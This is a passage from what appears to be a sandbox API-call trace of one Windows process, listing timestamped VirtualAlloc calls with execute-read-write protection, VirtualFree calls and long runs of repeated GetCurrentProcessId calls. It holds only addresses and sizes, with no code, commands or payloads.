flAllocationType=0x1000, flProtect=0x40) returned 0x2980000 [0280.126] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x1000, flProtect=0x40) returned 0x2990000 [0280.126] VirtualAlloc (lpAddress=0x0, dwSize=0xb4, flAllocationType=0x1000, flProtect=0x40) returned 0x29a0000 [0280.126] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x1000, flProtect=0x40) returned 0x29b0000 [0280.126] VirtualAlloc (lpAddress=0x0, dwSize=0x328, flAllocationType=0x1000, flProtect=0x40) returned 0x29c0000 [0280.127] GetCurrentProcessId () returned 0xb7c [0280.127] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x29d0000 [0280.127] VirtualAlloc (lpAddress=0x0, dwSize=0x9f, flAllocationType=0x1000, flProtect=0x40) returned 0x29e0000 [0280.127] VirtualAlloc (lpAddress=0x0, dwSize=0xb4, flAllocationType=0x1000, flProtect=0x40) returned 0x29f0000 [0280.128] VirtualAlloc (lpAddress=0x0, dwSize=0x1a2, flAllocationType=0x1000, flProtect=0x40) returned 0x2a00000 [0280.128] VirtualAlloc (lpAddress=0x0, dwSize=0x8d, flAllocationType=0x1000, flProtect=0x40) returned 0x2a10000 [0280.128] VirtualAlloc (lpAddress=0x0, dwSize=0x95, flAllocationType=0x1000, flProtect=0x40) returned 0x2a20000 [0280.129] VirtualAlloc (lpAddress=0x0, dwSize=0x293, flAllocationType=0x1000, flProtect=0x40) returned 0x2a30000 [0280.129] VirtualAlloc (lpAddress=0x0, dwSize=0x8c, flAllocationType=0x1000, flProtect=0x40) returned 0x2a40000 [0280.129] VirtualAlloc (lpAddress=0x0, dwSize=0x14f, flAllocationType=0x1000, flProtect=0x40) returned 0x2a50000 [0280.130] VirtualAlloc (lpAddress=0x0, dwSize=0xc1, flAllocationType=0x1000, flProtect=0x40) returned 0x2a60000 [0280.130] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x1000, flProtect=0x40) returned 0x2a70000 [0280.130] GetCurrentProcessId () returned 0xb7c [0280.130] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2a80000 [0280.130] VirtualAlloc (lpAddress=0x0, dwSize=0xb8, flAllocationType=0x1000, flProtect=0x40) returned 0x2a90000 [0280.131] VirtualAlloc (lpAddress=0x0, dwSize=0xb1, flAllocationType=0x1000, flProtect=0x40) returned 0x2aa0000 [0280.131] VirtualAlloc (lpAddress=0x0, dwSize=0x1bc, flAllocationType=0x1000, flProtect=0x40) returned 0x2ab0000 [0280.131] VirtualAlloc (lpAddress=0x0, dwSize=0x2c1, flAllocationType=0x1000, flProtect=0x40) returned 0x2ac0000 [0280.132] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x1000, flProtect=0x40) returned 0x2ad0000 [0280.132] VirtualAlloc (lpAddress=0x0, dwSize=0xdd, flAllocationType=0x1000, flProtect=0x40) returned 0x2ae0000 [0280.132] VirtualAlloc (lpAddress=0x0, dwSize=0x84, flAllocationType=0x1000, flProtect=0x40) returned 0x2af0000 [0280.133] VirtualAlloc (lpAddress=0x0, dwSize=0x95, flAllocationType=0x1000, flProtect=0x40) returned 0x2b00000 [0280.133] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x1000, flProtect=0x40) returned 0x2b10000 [0280.133] VirtualAlloc (lpAddress=0x0, dwSize=0xc3, flAllocationType=0x1000, flProtect=0x40) returned 0x2b20000 [0280.133] VirtualAlloc (lpAddress=0x358000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x358000 [0280.134] GetCurrentProcessId () returned 0xb7c [0280.134] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2b30000 [0280.134] VirtualAlloc (lpAddress=0x0, dwSize=0xc7, flAllocationType=0x1000, flProtect=0x40) returned 0x2b40000 [0280.134] VirtualAlloc (lpAddress=0x0, dwSize=0xb6, flAllocationType=0x1000, flProtect=0x40) returned 0x2b50000 [0280.135] VirtualAlloc (lpAddress=0x0, dwSize=0x8c, flAllocationType=0x1000, flProtect=0x40) returned 0x2b60000 [0280.135] VirtualAlloc (lpAddress=0x0, dwSize=0xad, flAllocationType=0x1000, flProtect=0x40) returned 0x2b70000 [0280.135] VirtualAlloc (lpAddress=0x0, dwSize=0x272, flAllocationType=0x1000, flProtect=0x40) returned 0x2b80000 [0280.136] VirtualAlloc (lpAddress=0x0, dwSize=0xa3, flAllocationType=0x1000, flProtect=0x40) returned 0x2b90000 [0280.276] VirtualAlloc (lpAddress=0x0, dwSize=0x8f, flAllocationType=0x1000, flProtect=0x40) returned 0x2ba0000 [0280.279] VirtualAlloc (lpAddress=0x0, dwSize=0xca, flAllocationType=0x1000, flProtect=0x40) returned 0x2bb0000 [0280.279] VirtualAlloc (lpAddress=0x0, dwSize=0xe3, flAllocationType=0x1000, flProtect=0x40) returned 0x2bc0000 [0280.280] VirtualAlloc (lpAddress=0x0, dwSize=0x9f, flAllocationType=0x1000, flProtect=0x40) returned 0x2bd0000 [0280.286] GetCurrentProcessId () returned 0xb7c [0280.286] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2be0000 [0280.298] VirtualAlloc (lpAddress=0x0, dwSize=0xb3, flAllocationType=0x1000, flProtect=0x40) returned 0x2bf0000 [0280.299] VirtualAlloc (lpAddress=0x0, dwSize=0xe1, flAllocationType=0x1000, flProtect=0x40) returned 0x2c00000 [0280.299] VirtualAlloc (lpAddress=0x0, dwSize=0x7b, flAllocationType=0x1000, flProtect=0x40) returned 0x2c10000 [0280.300] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x1000, flProtect=0x40) returned 0x2c20000 [0280.300] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x1000, flProtect=0x40) returned 0x2c30000 [0280.300] VirtualAlloc (lpAddress=0x0, dwSize=0x399, flAllocationType=0x1000, flProtect=0x40) returned 0x2c40000 [0280.301] VirtualAlloc (lpAddress=0x0, dwSize=0xa9, flAllocationType=0x1000, flProtect=0x40) returned 0x2c50000 [0280.301] VirtualAlloc (lpAddress=0x0, dwSize=0xb6, flAllocationType=0x1000, flProtect=0x40) returned 0x2c60000 [0280.302] VirtualAlloc (lpAddress=0x0, dwSize=0x133, flAllocationType=0x1000, flProtect=0x40) returned 0x2c70000 [0280.302] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x1000, flProtect=0x40) returned 0x2c80000 [0280.302] GetCurrentProcessId () returned 0xb7c [0280.302] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2c90000 [0280.303] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x1000, flProtect=0x40) returned 0x2ca0000 [0280.303] VirtualAlloc (lpAddress=0x0, dwSize=0xc6, flAllocationType=0x1000, flProtect=0x40) returned 0x2cb0000 [0280.303] VirtualAlloc (lpAddress=0x0, dwSize=0x86, flAllocationType=0x1000, flProtect=0x40) returned 0x2cc0000 [0280.304] VirtualAlloc (lpAddress=0x0, dwSize=0x99, flAllocationType=0x1000, flProtect=0x40) returned 0x2cd0000 [0280.304] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x1000, flProtect=0x40) returned 0x2ce0000 [0280.304] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x1000, flProtect=0x40) returned 0x2cf0000 [0280.305] VirtualAlloc (lpAddress=0x0, dwSize=0xd1, flAllocationType=0x1000, flProtect=0x40) returned 0x2d00000 [0280.305] VirtualAlloc (lpAddress=0x0, dwSize=0x87, flAllocationType=0x1000, flProtect=0x40) returned 0x2d10000 [0280.305] VirtualAlloc (lpAddress=0x0, dwSize=0x1af, flAllocationType=0x1000, flProtect=0x40) returned 0x2d20000 [0280.306] VirtualAlloc (lpAddress=0x0, dwSize=0x9d, flAllocationType=0x1000, flProtect=0x40) returned 0x2d30000 [0280.306] GetCurrentProcessId () returned 0xb7c [0280.306] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2d40000 [0280.306] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x1000, flProtect=0x40) returned 0x2d50000 [0280.307] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x1000, flProtect=0x40) returned 0x2d60000 [0280.307] VirtualAlloc (lpAddress=0x0, dwSize=0x65, flAllocationType=0x1000, flProtect=0x40) returned 0x2d70000 [0280.448] VirtualAlloc (lpAddress=0x0, dwSize=0x3a6, flAllocationType=0x1000, flProtect=0x40) returned 0x2d80000 [0280.449] VirtualAlloc (lpAddress=0x0, dwSize=0x139, flAllocationType=0x1000, flProtect=0x40) returned 0x2d90000 [0280.449] VirtualAlloc (lpAddress=0x0, dwSize=0x388, flAllocationType=0x1000, flProtect=0x40) returned 0x2da0000 [0280.450] VirtualAlloc (lpAddress=0x0, dwSize=0xfc, flAllocationType=0x1000, flProtect=0x40) returned 0x2db0000 [0280.450] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x1000, flProtect=0x40) returned 0x2dc0000 [0280.451] VirtualAlloc (lpAddress=0x0, dwSize=0xcb, flAllocationType=0x1000, flProtect=0x40) returned 0x2dd0000 [0280.451] VirtualAlloc (lpAddress=0x0, dwSize=0xa1, flAllocationType=0x1000, flProtect=0x40) returned 0x2de0000 [0280.451] GetCurrentProcessId () returned 0xb7c [0280.452] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2df0000 [0280.452] VirtualAlloc (lpAddress=0x0, dwSize=0xc5, flAllocationType=0x1000, flProtect=0x40) returned 0x2e00000 [0280.453] VirtualAlloc (lpAddress=0x0, dwSize=0xa7, flAllocationType=0x1000, flProtect=0x40) returned 0x2e10000 [0280.453] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x1000, flProtect=0x40) returned 0x2e20000 [0280.454] VirtualAlloc (lpAddress=0x0, dwSize=0x281, flAllocationType=0x1000, flProtect=0x40) returned 0x2e30000 [0280.454] VirtualAlloc (lpAddress=0x0, dwSize=0x8e, flAllocationType=0x1000, flProtect=0x40) returned 0x2e40000 [0280.455] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x2e50000 [0280.455] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x1000, flProtect=0x40) returned 0x2e60000 [0280.456] VirtualAlloc (lpAddress=0x0, dwSize=0xbe, flAllocationType=0x1000, flProtect=0x40) returned 0x2e70000 [0280.456] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x1000, flProtect=0x40) returned 0x2e80000 [0280.456] VirtualAlloc (lpAddress=0x0, dwSize=0x323, flAllocationType=0x1000, flProtect=0x40) returned 0x2e90000 [0280.457] VirtualAlloc (lpAddress=0x35c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x35c000 [0280.458] GetCurrentProcessId () returned 0xb7c [0280.458] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2ea0000 [0280.458] VirtualAlloc (lpAddress=0x0, dwSize=0x9d, flAllocationType=0x1000, flProtect=0x40) returned 0x2eb0000 [0280.459] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x1000, flProtect=0x40) returned 0x2ec0000 [0280.459] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x1000, flProtect=0x40) returned 0x2ed0000 [0280.460] VirtualAlloc (lpAddress=0x0, dwSize=0x97, flAllocationType=0x1000, flProtect=0x40) returned 0x2ee0000 [0280.460] VirtualAlloc (lpAddress=0x0, dwSize=0x42b, flAllocationType=0x1000, flProtect=0x40) returned 0x2ef0000 [0280.461] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x1000, flProtect=0x40) returned 0x2f00000 [0280.461] VirtualAlloc (lpAddress=0x0, dwSize=0x20b, flAllocationType=0x1000, flProtect=0x40) returned 0x2f10000 [0280.462] VirtualAlloc (lpAddress=0x0, dwSize=0x8f, flAllocationType=0x1000, flProtect=0x40) returned 0x2f20000 [0280.462] VirtualAlloc (lpAddress=0x0, dwSize=0x99, flAllocationType=0x1000, flProtect=0x40) returned 0x2f30000 [0280.463] VirtualAlloc (lpAddress=0x0, dwSize=0xab, flAllocationType=0x1000, flProtect=0x40) returned 0x2f40000 [0280.463] GetCurrentProcessId () returned 0xb7c [0280.463] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2f50000 [0280.464] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x1000, flProtect=0x40) returned 0x2f60000 [0280.464] VirtualAlloc (lpAddress=0x0, dwSize=0x65f, flAllocationType=0x1000, flProtect=0x40) returned 0x2f70000 [0280.465] VirtualAlloc (lpAddress=0x0, dwSize=0xd2, flAllocationType=0x1000, flProtect=0x40) returned 0x2f80000 [0280.466] VirtualAlloc (lpAddress=0x0, dwSize=0x9f, flAllocationType=0x1000, flProtect=0x40) returned 0x2f90000 [0280.466] VirtualAlloc (lpAddress=0x0, dwSize=0xa1, flAllocationType=0x1000, flProtect=0x40) returned 0x2fa0000 [0280.467] VirtualAlloc (lpAddress=0x0, dwSize=0x9b, flAllocationType=0x1000, flProtect=0x40) returned 0x2fb0000 [0280.467] VirtualAlloc (lpAddress=0x0, dwSize=0x418, flAllocationType=0x1000, flProtect=0x40) returned 0x2fc0000 [0280.468] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x1000, flProtect=0x40) returned 0x2fd0000 [0280.468] VirtualAlloc (lpAddress=0x0, dwSize=0xd8, flAllocationType=0x1000, flProtect=0x40) returned 0x2fe0000 [0280.469] VirtualAlloc (lpAddress=0x0, dwSize=0x97, flAllocationType=0x1000, flProtect=0x40) returned 0x2ff0000 [0280.469] VirtualAlloc (lpAddress=0x360000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x360000 [0280.470] GetCurrentProcessId () returned 0xb7c [0280.470] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3000000 [0280.471] VirtualAlloc (lpAddress=0x0, dwSize=0x26a, flAllocationType=0x1000, flProtect=0x40) returned 0x3010000 [0280.471] VirtualAlloc (lpAddress=0x0, dwSize=0x81, flAllocationType=0x1000, flProtect=0x40) returned 0x3020000 [0280.472] VirtualAlloc (lpAddress=0x0, dwSize=0x79, flAllocationType=0x1000, flProtect=0x40) returned 0x3030000 [0280.472] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x1000, flProtect=0x40) returned 0x3040000 [0280.473] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x1000, flProtect=0x40) returned 0x3050000 [0280.473] VirtualAlloc (lpAddress=0x0, dwSize=0xb5, flAllocationType=0x1000, flProtect=0x40) returned 0x3060000 [0280.474] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x1000, flProtect=0x40) returned 0x3070000 [0280.474] VirtualAlloc (lpAddress=0x0, dwSize=0xa3, flAllocationType=0x1000, flProtect=0x40) returned 0x3080000 [0280.475] VirtualAlloc (lpAddress=0x0, dwSize=0x396, flAllocationType=0x1000, flProtect=0x40) returned 0x3090000 [0280.475] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x1000, flProtect=0x40) returned 0x30a0000 [0280.476] GetCurrentProcessId () returned 0xb7c [0280.476] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x30b0000 [0280.477] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x30c0000 [0280.477] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x1000, flProtect=0x40) returned 0x30d0000 [0280.478] VirtualAlloc (lpAddress=0x0, dwSize=0x521, flAllocationType=0x1000, flProtect=0x40) returned 0x30e0000 [0280.480] VirtualAlloc (lpAddress=0x0, dwSize=0xcb, flAllocationType=0x1000, flProtect=0x40) returned 0x30f0000 [0280.481] VirtualAlloc (lpAddress=0x0, dwSize=0xad, flAllocationType=0x1000, flProtect=0x40) returned 0x3100000 [0280.482] VirtualAlloc (lpAddress=0x0, dwSize=0x9b, flAllocationType=0x1000, flProtect=0x40) returned 0x3110000 [0280.482] VirtualAlloc (lpAddress=0x0, dwSize=0xaf, flAllocationType=0x1000, flProtect=0x40) returned 0x3120000 [0280.483] VirtualAlloc (lpAddress=0x0, dwSize=0x88, flAllocationType=0x1000, flProtect=0x40) returned 0x3130000 [0280.484] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x1000, flProtect=0x40) returned 0x3140000 [0280.485] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x1000, flProtect=0x40) returned 0x3150000 [0280.485] GetCurrentProcessId () returned 0xb7c [0280.486] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3160000 [0280.486] VirtualAlloc (lpAddress=0x0, dwSize=0x8b, flAllocationType=0x1000, flProtect=0x40) returned 0x3170000 [0280.487] VirtualAlloc (lpAddress=0x0, dwSize=0x99, flAllocationType=0x1000, flProtect=0x40) returned 0x3180000 [0280.488] VirtualAlloc (lpAddress=0x0, dwSize=0xb6, flAllocationType=0x1000, flProtect=0x40) returned 0x3190000 [0280.489] VirtualAlloc (lpAddress=0x0, dwSize=0xa5, flAllocationType=0x1000, flProtect=0x40) returned 0x31a0000 [0280.490] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x1000, flProtect=0x40) returned 0x31b0000 [0280.490] VirtualAlloc (lpAddress=0x0, dwSize=0x86, flAllocationType=0x1000, flProtect=0x40) returned 0x31c0000 [0280.491] VirtualAlloc (lpAddress=0x0, dwSize=0x91, flAllocationType=0x1000, flProtect=0x40) returned 0x31d0000 [0280.492] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x1000, flProtect=0x40) returned 0x31e0000 [0280.493] VirtualAlloc (lpAddress=0x0, dwSize=0x371, flAllocationType=0x1000, flProtect=0x40) returned 0x31f0000 [0280.494] VirtualAlloc (lpAddress=0x0, dwSize=0x7f, flAllocationType=0x1000, flProtect=0x40) returned 0x3200000 [0280.494] VirtualAlloc (lpAddress=0x364000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x364000 [0280.648] GetCurrentProcessId () returned 0xb7c [0280.648] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3210000 [0280.649] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x1000, flProtect=0x40) returned 0x3220000 [0280.650] VirtualAlloc (lpAddress=0x0, dwSize=0xa1, flAllocationType=0x1000, flProtect=0x40) returned 0x3230000 [0280.650] VirtualAlloc (lpAddress=0x0, dwSize=0x327, flAllocationType=0x1000, flProtect=0x40) returned 0x3240000 [0280.652] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x3250000 [0280.653] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x1000, flProtect=0x40) returned 0x3260000 [0280.654] VirtualAlloc (lpAddress=0x0, dwSize=0xaa, flAllocationType=0x1000, flProtect=0x40) returned 0x3270000 [0280.654] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x3280000 [0280.655] VirtualAlloc (lpAddress=0x0, dwSize=0xc1, flAllocationType=0x1000, flProtect=0x40) returned 0x3290000 [0280.656] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x1000, flProtect=0x40) returned 0x32a0000 [0280.657] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x1000, flProtect=0x40) returned 0x32b0000 [0280.657] GetCurrentProcessId () returned 0xb7c [0280.657] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x32c0000 [0280.658] VirtualAlloc (lpAddress=0x0, dwSize=0xaf, flAllocationType=0x1000, flProtect=0x40) returned 0x32d0000 [0280.659] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x1000, flProtect=0x40) returned 0x32e0000 [0280.659] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x1000, flProtect=0x40) returned 0x32f0000 [0280.660] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x1000, flProtect=0x40) returned 0x3300000 [0280.661] VirtualAlloc (lpAddress=0x0, dwSize=0xb5, flAllocationType=0x1000, flProtect=0x40) returned 0x3310000 [0280.662] VirtualAlloc (lpAddress=0x0, dwSize=0xd1, flAllocationType=0x1000, flProtect=0x40) returned 0x3320000 [0280.662] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x1000, flProtect=0x40) returned 0x3330000 [0280.663] VirtualAlloc (lpAddress=0x0, dwSize=0xa3, flAllocationType=0x1000, flProtect=0x40) returned 0x3340000 [0280.664] VirtualAlloc (lpAddress=0x0, dwSize=0xb3, flAllocationType=0x1000, flProtect=0x40) returned 0x3350000 [0280.664] VirtualAlloc (lpAddress=0x0, dwSize=0x1f3, flAllocationType=0x1000, flProtect=0x40) returned 0x3360000 [0280.665] GetCurrentProcessId () returned 0xb7c [0280.665] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3370000 [0280.666] VirtualAlloc (lpAddress=0x0, dwSize=0x18a, flAllocationType=0x1000, flProtect=0x40) returned 0x3380000 [0280.667] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x1000, flProtect=0x40) returned 0x3390000 [0280.667] VirtualAlloc (lpAddress=0x0, dwSize=0xa9, flAllocationType=0x1000, flProtect=0x40) returned 0x33a0000 [0280.668] VirtualAlloc (lpAddress=0x0, dwSize=0xaa, flAllocationType=0x1000, flProtect=0x40) returned 0x33b0000 [0280.669] VirtualAlloc (lpAddress=0x0, dwSize=0x9b, flAllocationType=0x1000, flProtect=0x40) returned 0x33c0000 [0280.790] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.790] GetCurrentProcessId () returned 0xb7c [0280.790] GetCurrentProcessId () returned 0xb7c [0280.790] GetCurrentProcessId () returned 0xb7c [0280.790] GetCurrentProcessId () returned 0xb7c [0280.790] GetCurrentProcessId () returned 0xb7c [0280.790] GetCurrentProcessId () returned 0xb7c [0280.790] GetCurrentProcessId () returned 0xb7c [0280.790] GetCurrentProcessId () returned 0xb7c [0280.790] GetCurrentProcessId () returned 0xb7c [0280.790] GetCurrentProcessId () returned 0xb7c [0280.790] GetCurrentProcessId () returned 0xb7c [0280.790] GetCurrentProcessId () returned 0xb7c [0280.791] GetCurrentProcessId () returned 0xb7c [0280.791] GetCurrentProcessId () returned 0xb7c [0280.791] GetCurrentProcessId () returned 0xb7c [0280.791] GetCurrentProcessId () returned 0xb7c [0280.791] GetCurrentProcessId () returned 0xb7c [0280.791] GetCurrentProcessId () returned 0xb7c [0280.791] GetCurrentProcessId () returned 0xb7c [0280.791] GetCurrentProcessId () returned 0xb7c [0280.791] GetCurrentProcessId () returned 0xb7c [0280.791] GetCurrentProcessId () returned 0xb7c [0280.791] GetCurrentProcessId () returned 0xb7c [0280.791] GetCurrentProcessId () returned 0xb7c [0280.792] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.792] GetCurrentProcessId () returned 0xb7c [0280.792] GetCurrentProcessId () returned 0xb7c [0280.792] GetCurrentProcessId () returned 0xb7c [0280.792] GetCurrentProcessId () returned 0xb7c [0280.792] GetCurrentProcessId () returned 0xb7c [0280.792] GetCurrentProcessId () returned 0xb7c [0280.792] GetCurrentProcessId () returned 0xb7c [0280.792] GetCurrentProcessId () returned 0xb7c [0280.792] GetCurrentProcessId () returned 0xb7c [0280.792] GetCurrentProcessId () returned 0xb7c [0280.793] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0280.793] GetCurrentProcessId () returned 0xb7c [0280.793] GetCurrentProcessId () returned 0xb7c [0280.793] GetCurrentProcessId () returned 0xb7c [0280.793] GetCurrentProcessId () returned 0xb7c [0280.793] GetCurrentProcessId () returned 0xb7c [0280.793] GetCurrentProcessId () returned 0xb7c [0280.793] GetCurrentProcessId () returned 0xb7c [0280.793] GetCurrentProcessId () returned 0xb7c [0280.793] GetCurrentProcessId () returned 0xb7c [0280.793] GetCurrentProcessId () returned 0xb7c [0280.793] GetCurrentProcessId () returned 0xb7c [0280.793] GetCurrentProcessId () returned 0xb7c [0280.793] GetCurrentProcessId () returned 0xb7c [0280.793] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.794] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.795] GetCurrentProcessId () returned 0xb7c [0280.796] GetCurrentProcessId () returned 0xb7c [0280.796] GetCurrentProcessId () returned 0xb7c [0280.796] GetCurrentProcessId () returned 0xb7c [0280.796] GetCurrentProcessId () returned 0xb7c [0280.796] GetCurrentProcessId () returned 0xb7c [0280.796] GetCurrentProcessId () returned 0xb7c [0280.796] GetCurrentProcessId () returned 0xb7c [0280.796] GetCurrentProcessId () returned 0xb7c [0280.796] GetCurrentProcessId () returned 0xb7c [0280.796] GetCurrentProcessId () returned 